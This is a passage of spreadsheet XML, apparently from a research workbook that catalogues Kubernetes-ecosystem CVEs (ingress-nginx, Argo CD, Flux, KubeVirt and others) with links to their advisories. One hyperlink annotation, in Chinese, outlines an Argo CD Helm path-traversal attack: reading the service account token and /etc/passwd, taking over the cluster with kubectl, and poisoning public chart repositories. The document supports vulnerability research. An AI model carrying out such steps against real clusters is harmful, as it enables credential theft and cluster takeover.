      <c r="B40" s="6" t="s">
        <v>865</v>
      </c>
      <c r="C40" s="7" t="s">
        <v>1330</v>
      </c>
      <c r="D40" s="7" t="s">
        <v>1331</v>
      </c>
      <c r="E40" s="7" t="s">
        <v>1332</v>
      </c>
      <c r="F40" s="5" t="s">
        <v>1333</v>
      </c>
      <c r="G40" s="7" t="s">
        <v>1334</v>
      </c>
      <c r="H40" s="6" t="s">
        <v>866</v>
      </c>
      <c r="I40" s="6" t="s">
        <v>867</v>
      </c>
      <c r="J40" s="6" t="s">
        <v>868</v>
      </c>
      <c r="K40" s="6" t="s">
        <v>870</v>
      </c>
      <c r="L40" s="6" t="s">
        <v>871</v>
      </c>
      <c r="M40" s="6" t="s">
        <v>872</v>
      </c>
      <c r="N40" s="6" t="s">
        <v>873</v>
      </c>
      <c r="O40" s="6" t="s">
        <v>1335</v>
      </c>
      <c r="P40" s="6"/>
      <c r="Q40" s="5"/>
      <c r="R40" s="5"/>
      <c r="S40" s="5"/>
    </row>
    <row r="41" ht="409.5" spans="1:19">
      <c r="A41" s="6" t="s">
        <v>878</v>
      </c>
      <c r="B41" s="6" t="s">
        <v>878</v>
      </c>
      <c r="C41" s="7" t="s">
        <v>1337</v>
      </c>
      <c r="D41" s="7" t="s">
        <v>1338</v>
      </c>
      <c r="E41" s="7" t="s">
        <v>1339</v>
      </c>
      <c r="F41" s="5" t="s">
        <v>887</v>
      </c>
      <c r="G41" s="7" t="s">
        <v>1340</v>
      </c>
      <c r="H41" s="6" t="s">
        <v>879</v>
      </c>
      <c r="I41" s="6" t="s">
        <v>880</v>
      </c>
      <c r="J41" s="6" t="s">
        <v>1341</v>
      </c>
      <c r="K41" s="6" t="s">
        <v>1342</v>
      </c>
      <c r="L41" s="6" t="s">
        <v>884</v>
      </c>
      <c r="M41" s="5" t="s">
        <v>872</v>
      </c>
      <c r="N41" s="6" t="s">
        <v>885</v>
      </c>
      <c r="O41" s="6" t="s">
        <v>886</v>
      </c>
      <c r="P41" s="6"/>
      <c r="Q41" s="5"/>
      <c r="R41" s="5"/>
      <c r="S41" s="5"/>
    </row>
    <row r="42" ht="409.5" spans="1:19">
      <c r="A42" s="6" t="s">
        <v>890</v>
      </c>
      <c r="B42" s="6" t="s">
        <v>890</v>
      </c>
      <c r="C42" s="7" t="s">
        <v>1344</v>
      </c>
      <c r="D42" s="7" t="s">
        <v>1345</v>
      </c>
      <c r="E42" s="7" t="s">
        <v>1346</v>
      </c>
      <c r="F42" s="5" t="s">
        <v>900</v>
      </c>
      <c r="G42" s="7" t="s">
        <v>1347</v>
      </c>
      <c r="H42" s="6" t="s">
        <v>891</v>
      </c>
      <c r="I42" s="6" t="s">
        <v>283</v>
      </c>
      <c r="J42" s="6" t="s">
        <v>892</v>
      </c>
      <c r="K42" s="6" t="s">
        <v>894</v>
      </c>
      <c r="L42" s="15" t="s">
        <v>895</v>
      </c>
      <c r="M42" s="6" t="s">
        <v>896</v>
      </c>
      <c r="N42" s="6" t="s">
        <v>897</v>
      </c>
      <c r="O42" s="6" t="s">
        <v>1348</v>
      </c>
      <c r="P42" s="6"/>
      <c r="Q42" s="5"/>
      <c r="R42" s="5"/>
      <c r="S42" s="5"/>
    </row>
    <row r="43" ht="409.5" spans="1:19">
      <c r="A43" s="11" t="s">
        <v>934</v>
      </c>
      <c r="B43" s="11" t="s">
        <v>934</v>
      </c>
      <c r="C43" s="7" t="s">
        <v>1349</v>
      </c>
      <c r="D43" s="7" t="s">
        <v>1350</v>
      </c>
      <c r="E43" s="7" t="s">
        <v>1351</v>
      </c>
      <c r="F43" s="11" t="s">
        <v>943</v>
      </c>
      <c r="G43" s="7" t="s">
        <v>1352</v>
      </c>
      <c r="H43" s="11" t="s">
        <v>1353</v>
      </c>
      <c r="I43" s="11" t="s">
        <v>283</v>
      </c>
      <c r="J43" s="11" t="s">
        <v>936</v>
      </c>
      <c r="K43" s="11" t="s">
        <v>938</v>
      </c>
      <c r="L43" s="11" t="s">
        <v>939</v>
      </c>
      <c r="M43" s="11" t="s">
        <v>940</v>
      </c>
      <c r="N43" s="11" t="s">
        <v>941</v>
      </c>
      <c r="O43" s="11" t="s">
        <v>942</v>
      </c>
      <c r="P43" s="11"/>
      <c r="Q43" s="11"/>
      <c r="R43" s="11"/>
      <c r="S43" s="11"/>
    </row>
    <row r="44" ht="409.5" spans="1:19">
      <c r="A44" s="12" t="s">
        <v>1354</v>
      </c>
      <c r="B44" s="11" t="s">
        <v>1355</v>
      </c>
      <c r="C44" s="7" t="s">
        <v>1356</v>
      </c>
      <c r="D44" s="8" t="s">
        <v>1357</v>
      </c>
      <c r="E44" s="7" t="s">
        <v>1358</v>
      </c>
      <c r="F44" s="11" t="s">
        <v>954</v>
      </c>
      <c r="G44" s="8"/>
      <c r="H44" s="11" t="s">
        <v>945</v>
      </c>
      <c r="I44" s="12" t="s">
        <v>283</v>
      </c>
      <c r="J44" s="12" t="s">
        <v>1359</v>
      </c>
      <c r="K44" s="11" t="s">
        <v>948</v>
      </c>
      <c r="L44" s="12" t="s">
        <v>949</v>
      </c>
      <c r="M44" s="11" t="s">
        <v>950</v>
      </c>
      <c r="N44" s="11" t="s">
        <v>951</v>
      </c>
      <c r="O44" s="11" t="s">
        <v>952</v>
      </c>
      <c r="P44" s="11"/>
      <c r="Q44" s="11"/>
      <c r="R44" s="11"/>
      <c r="S44" s="11"/>
    </row>
    <row r="45" spans="1:19">
      <c r="A45" s="1" t="s">
        <v>956</v>
      </c>
      <c r="B45" s="2" t="s">
        <v>1360</v>
      </c>
      <c r="C45" s="2" t="s">
        <v>1361</v>
      </c>
      <c r="D45" s="2" t="s">
        <v>1362</v>
      </c>
      <c r="E45" s="2" t="s">
        <v>1363</v>
      </c>
      <c r="F45" s="1" t="s">
        <v>963</v>
      </c>
      <c r="G45" s="2" t="s">
        <v>1364</v>
      </c>
      <c r="H45" s="1" t="s">
        <v>957</v>
      </c>
      <c r="I45" s="1" t="s">
        <v>486</v>
      </c>
      <c r="J45" s="1" t="s">
        <v>1365</v>
      </c>
      <c r="L45" s="1" t="s">
        <v>960</v>
      </c>
      <c r="M45" s="1" t="s">
        <v>63</v>
      </c>
      <c r="N45" s="1" t="s">
        <v>961</v>
      </c>
      <c r="O45" s="1" t="s">
        <v>1366</v>
      </c>
      <c r="S45" s="1" t="s">
        <v>968</v>
      </c>
    </row>
    <row r="46" spans="1:15">
      <c r="A46" s="1" t="s">
        <v>974</v>
      </c>
      <c r="B46" s="4" t="s">
        <v>1368</v>
      </c>
      <c r="C46" s="2" t="s">
        <v>1369</v>
      </c>
      <c r="D46" s="2" t="s">
        <v>1370</v>
      </c>
      <c r="E46" s="2" t="s">
        <v>1371</v>
      </c>
      <c r="F46" s="1" t="s">
        <v>1372</v>
      </c>
      <c r="G46" s="2" t="s">
        <v>1373</v>
      </c>
      <c r="H46" s="1" t="s">
        <v>957</v>
      </c>
      <c r="I46" s="1" t="s">
        <v>486</v>
      </c>
      <c r="J46" s="1" t="s">
        <v>1374</v>
      </c>
      <c r="K46" s="20" t="s">
        <v>976</v>
      </c>
      <c r="L46" s="1" t="s">
        <v>977</v>
      </c>
      <c r="M46" s="1" t="s">
        <v>63</v>
      </c>
      <c r="N46" s="1" t="s">
        <v>961</v>
      </c>
      <c r="O46" s="1" t="s">
        <v>1366</v>
      </c>
    </row>
    <row r="47" spans="1:19">
      <c r="A47" s="1" t="s">
        <v>985</v>
      </c>
      <c r="B47" s="4" t="s">
        <v>1375</v>
      </c>
      <c r="C47" s="2" t="s">
        <v>1376</v>
      </c>
      <c r="D47" s="2" t="s">
        <v>1377</v>
      </c>
      <c r="E47" s="2" t="s">
        <v>1378</v>
      </c>
      <c r="F47" s="1" t="s">
        <v>990</v>
      </c>
      <c r="G47" s="2" t="s">
        <v>1379</v>
      </c>
      <c r="H47" s="1" t="s">
        <v>957</v>
      </c>
      <c r="I47" s="1" t="s">
        <v>486</v>
      </c>
      <c r="J47" s="1" t="s">
        <v>1380</v>
      </c>
      <c r="K47" s="20" t="s">
        <v>988</v>
      </c>
      <c r="L47" s="1" t="s">
        <v>989</v>
      </c>
      <c r="M47" s="1" t="s">
        <v>63</v>
      </c>
      <c r="N47" s="1" t="s">
        <v>961</v>
      </c>
      <c r="O47" s="1" t="s">
        <v>1366</v>
      </c>
      <c r="S47" s="1" t="s">
        <v>151</v>
      </c>
    </row>
    <row r="48" spans="1:19">
      <c r="A48" s="1" t="s">
        <v>999</v>
      </c>
      <c r="B48" s="4" t="s">
        <v>1381</v>
      </c>
      <c r="C48" s="2" t="s">
        <v>1382</v>
      </c>
      <c r="D48" s="2" t="s">
        <v>1383</v>
      </c>
      <c r="E48" s="2" t="s">
        <v>1384</v>
      </c>
      <c r="F48" s="1" t="s">
        <v>1385</v>
      </c>
      <c r="G48" s="2" t="s">
        <v>1386</v>
      </c>
      <c r="I48" s="1" t="s">
        <v>486</v>
      </c>
      <c r="J48" s="1" t="s">
        <v>1000</v>
      </c>
      <c r="K48" s="1" t="s">
        <v>1002</v>
      </c>
      <c r="L48" s="1" t="s">
        <v>1003</v>
      </c>
      <c r="M48" s="1" t="s">
        <v>63</v>
      </c>
      <c r="N48" s="1" t="s">
        <v>961</v>
      </c>
      <c r="O48" s="1" t="s">
        <v>1387</v>
      </c>
      <c r="S48" s="1" t="s">
        <v>1009</v>
      </c>
    </row>
  </sheetData>
  <autoFilter xmlns:etc="http://www.wps.cn/officeDocument/2017/etCustomData" ref="A1:S48" etc:filterBottomFollowUsedRange="0">
    <extLst/>
  </autoFilter>
  <hyperlinks>
    <hyperlink ref="L9" r:id="rId1" display="&#10;nginx-ingress:&#10;k8s: https://github.com/kubernetes/kubernetes/issues/126811" tooltip="https://github.com/kubernetes/kubernetes/issues/126811"/>
    <hyperlink ref="J8" r:id="rId2" display="Ingress-nginx path can be pointed to service account token file：A security issue was discovered in ingress-nginx where a user that can create or update ingress objects can use the spec.rules[].http.paths[].path field of an Ingress object (in the networking.k8s.io or extensions API group) to obtain the credentials of the ingress-nginx controller. In the default configuration, that credential has access to all secrets in the cluster." tooltip="https://github.com/kubernetes/ingress-nginx"/>
    <hyperlink ref="L8" r:id="rId3" display="https://github.com/kubernetes/kubernetes/issues/126812" tooltip="https://github.com/kubernetes/kubernetes/issues/126812"/>
    <hyperlink ref="J7" r:id="rId2" display="Ingress-nginx directive injection via annotations: A security issue was discovered in ingress-nginx where a user that can create or update ingress objects can use .metadata.annotations in an Ingress object (in the networking.k8s.io or extensions API group) to obtain the credentials of the ingress-nginx controller. In the default configuration, that credential has access to all secrets in the cluster." tooltip="https://github.com/kubernetes/ingress-nginx"/>
    <hyperlink ref="L7" r:id="rId4" display="https://github.com/kubernetes/kubernetes/issues/126813" tooltip="https://github.com/kubernetes/kubernetes/issues/126813"/>
    <hyperlink ref="L6" r:id="rId5" display="https://github.com/kubernetes/ingress-nginx/issues/10572" tooltip="https://github.com/kubernetes/ingress-nginx/issues/10572"/>
    <hyperlink ref="L10" r:id="rId6" display="https://github.com/istio/istio/security/advisories/GHSA-mq8f-9446-c28r" tooltip="https://github.com/istio/istio/security/advisories/GHSA-mq8f-9446-c28r"/>
    <hyperlink ref="L13" r:id="rId7" display="https://github.com/cri-o/cri-o/security/advisories/GHSA-6x2m-w449-qwx7"/>
    <hyperlink ref="L11" r:id="rId8" display="https://github.com/cri-o/cri-o/security/advisories/GHSA-2cgq-h8xw-2v5j"/>
    <hyperlink ref="K18" r:id="rId9" display="Patched versions&#10;0.55.1&#10;&#10;&#10;https://github.com/kubevirt/kubevirt/pull/8198&#10;https://github.com/kubevirt/kubevirt/pull/8268&#10;&#10;"/>
    <hyperlink ref="K19" r:id="rId10" display="kubevirt 0.30&#10;&#10;https://github.com/kubevirt/kubevirt/pull/3686"/>
    <hyperlink ref="L20" r:id="rId11" display="https://github.com/argoproj/argo-workflows/security/advisories/GHSA-cmv8-6362-r5w9"/>
    <hyperlink ref="L33" r:id="rId12" display="https://github.com/fluxcd/kustomize-controller/security/advisories/GHSA-35rf-v2jv-gfg7"/>
    <hyperlink ref="L16" r:id="rId13" display="https://github.com/cilium/cilium/security/advisories/GHSA-gj2r-phwg-6rww"/>
    <hyperlink ref="L17" r:id="rId14" display="https://github.com/projectcontour/contour/security/advisories/GHSA-5ph6-qq5x-7jwc"/>
    <hyperlink ref="L27" r:id="rId15" display="https://github.com/argoproj/argo-cd/security/advisories/GHSA-h6h5-6fmq-rh28"/>
    <hyperlink ref="K28" r:id="rId16" display="2.6.1&#10;https://github.com/argoproj/argo-cd/pull/12320/commits/200c3c156e9c27c6c5b197a5be28315e9b802b12"/>
    <hyperlink ref="L28" r:id="rId17" display="https://github.com/argoproj/argo-cd/issues/12309&#10;&#10;https://github.com/argoproj/argo-cd/security/advisories/GHSA-mv6w-j4xc-qpfw"/>
    <hyperlink ref="L25" r:id="rId18" display="https://github.com/argoproj/argo-events/security/advisories/GHSA-qpgx-64h2-gc3c&#10;&#10;https://github.com/argoproj/argo-events/issues/1947"/>
    <hyperlink ref="O26" r:id="rId19" display="https://apiiro.com/blog/malicious-kubernetes-helm-charts-can-be-used-to-steal-sensitive-information-from-argo-cd-deployments/&#10;&#10;&#10; 1..敏感信息泄露&#10;​目标文件：&#10;Kubernetes Secrets（如/var/run/secrets/kubernetes.io/serviceaccount/token）；&#10;其他应用的明文配置文件（如数据库凭证）；&#10;系统敏感文件（如/etc/passwd）。&#10;​攻击步骤：&#10;提交包含恶意valueFiles路径的Helm Chart至仓库；&#10;Argo CD同步时触发helmTemplate逻辑；&#10;url.ParseRequestURI()误判路径为URI，跳过EnforceToCurrentRoot()检查；&#10;读取目标文件内容并解析为YAML参数，通过Argo CD API或UI泄露。&#10;2. ​横向移动与权限提升&#10;​场景延伸：&#10;窃取集群管理员Token，通过kubectl接管集群；&#10;读取其他应用的values.yaml，获取数据库连接字符串等敏感信息；&#10;利用泄露的SSH密钥访问内部系统。&#10;​利用链示例：&#10;mermaid&#10;graph TD&#10;    A[提交恶意Chart] --&gt; B[绕过路径检查]&#10;    B --&gt; C[读取ServiceAccount Token]&#10;    C --&gt; D[通过kubectl执行任意命令]&#10;    D --&gt; E[部署恶意Pod或窃取数据]&#10;3. ​供应链攻击&#10;​污染公共Helm仓库：&#10;攻击者上传包含恶意valueFiles的Chart至公共仓库（如Artifact Hub），诱导用户部署。&#10;​后果：&#10;所有使用该Chart的Argo CD实例自动同步后，敏感数据将泄露至攻击者控制的端点&#10;&#10;"/>
    <hyperlink ref="L24" r:id="rId20" display="https://github.com/argoproj/argo-workflows/issues/6441&#10;&#10;https://github.com/argoproj/argo-workflows/security/advisories/GHSA-h563-xh25-x54q"/>
    <hyperlink ref="L31" r:id="rId21" display="https://github.com/backstage/backstage/security/advisories/GHSA-wg6p-jmpc-xjmr"/>
    <hyperlink ref="L32" r:id="rId22" display="https://github.com/backstage/backstage/security/advisories/GHSA-pvv8-8fx9-h673"/>
    <hyperlink ref="K34" r:id="rId23" display="https://github.com/fluxcd/source-controller/pull/903/commits/27f4ed5a472d1bd5b6bc7a62189f20c115338b3a"/>
    <hyperlink ref="L35" r:id="rId24" display="https://github.com/fluxcd/flux2/security/advisories/GHSA-p2g7-xwvr-rrw3"/>
    <hyperlink ref="L34" r:id="rId25" display="https://github.com/fluxcd/flux2/security/advisories/GHSA-f4p5-x4vc-mh4v"/>
    <hyperlink ref="L37" r:id="rId26" display="https://github.com/fluxcd/flux2/security/advisories/GHSA-7pwf-jg34-hxwp"/>
    <hyperlink ref="L18" r:id="rId27" display="https://github.com/kubevirt/kubevirt/security/advisories/GHSA-qv98-3369-g364&#10;&#10;google research:&#10;https://github.com/google/security-research/security/advisories/GHSA-cvx8-ppmc-78hm"/>
    <hyperlink ref="L19" r:id="rId28" display="https://bugzilla.redhat.com/show_bug.cgi?id=1848951"/>
    <hyperlink ref="L15" r:id="rId29" display="https://github.com/containerd/containerd/security/advisories/GHSA-5ffw-gxpp-mxpf"/>
    <hyperlink ref="L42" r:id="rId30" display="https://github.com/metal3-io/baremetal-operator/security/advisories/GHSA-pqfh-xh7w-7h3p"/>
    <hyperlink ref="L2" r:id="rId31" display="https://github.com/kubernetes/kubernetes/issues/126744"/>
    <hyperlink ref="L38" r:id="rId32" display="https://github.com/fluxcd/flux2/security/advisories/GHSA-vvmq-fwmg-2gjc" tooltip="https://github.com/fluxcd/flux2/security/advisories/GHSA-vvmq-fwmg-2gjc"/>
    <hyperlink ref="L21" r:id="rId33" display="https://github.com/argoproj/argo-cd/security/advisories/GHSA-q4w5-4gq2-98vm"/>
    <hyperlink ref="L22" r:id="rId34" display="https://github.com/argoproj/argo-cd/security/advisories/GHSA-jhqp-vf4w-rpwq"/>
    <hyperlink ref="L47" r:id="rId35" display="https://github.com/kubernetes/kubernetes/issues/131006" tooltip="https://github.com/kubernetes/kubernetes/issues/131006"/>
    <hyperlink ref="L46" r:id="rId36" display="https://github.com/kubernetes/kubernetes/issues/131008" tooltip="https://github.com/kubernetes/kubernetes/issues/131008"/>
    <hyperlink ref="L45" r:id="rId37" display="https://github.com/kubernetes/kubernetes/issues/131007" tooltip="https://github.com/kubernetes/kubernetes/issues/131007"/>
    <hyperlink ref="L48" r:id="rId38" display="https://github.com/kubernetes/kubernetes/issues/131005&#10;&#10;https://github.com/advisories/GHSA-242m-6h72-7hgp"/>
    <hyperlink ref="K47" r:id="rId39" display="https://github.com/kubernetes/ingress-nginx/pull/13068/commits/ab470eb920924d62a197ebddd8a4cc3031a77ddf"/>
    <hyperlink ref="K46" r:id="rId40" display="https://github.com/kubernetes/ingress-nginx/pull/13068/commits/2e9f37380afb7853fa6daa1c3e6659550aadfd90"/>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第一轮原始分析数据</vt:lpstr>
      <vt:lpstr>第二轮分析数据</vt:lpstr>
      <vt:lpstr>最终确定的CVE漏洞数据</vt:lpstr>
      <vt:lpstr>触发输入和方式相关的统计信息</vt:lpstr>
      <vt:lpstr>触发效果相关的统计信息</vt:lpstr>
      <vt:lpstr>修复方式以及根本原因相关统计</vt:lpstr>
      <vt:lpstr>发现方法相关的统计信息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dc:creator>
  <cp:lastModifiedBy>Astrid</cp:lastModifiedBy>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-05-13T10:47:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-07-31T11:18:14Z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70E7004163A445699A6010C461D25C82_13</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="KSOProductBuildVer">
    <vt:lpwstr>2052-12.1.0.21915</vt:lpwstr>
  </property>
</Properties>
</file>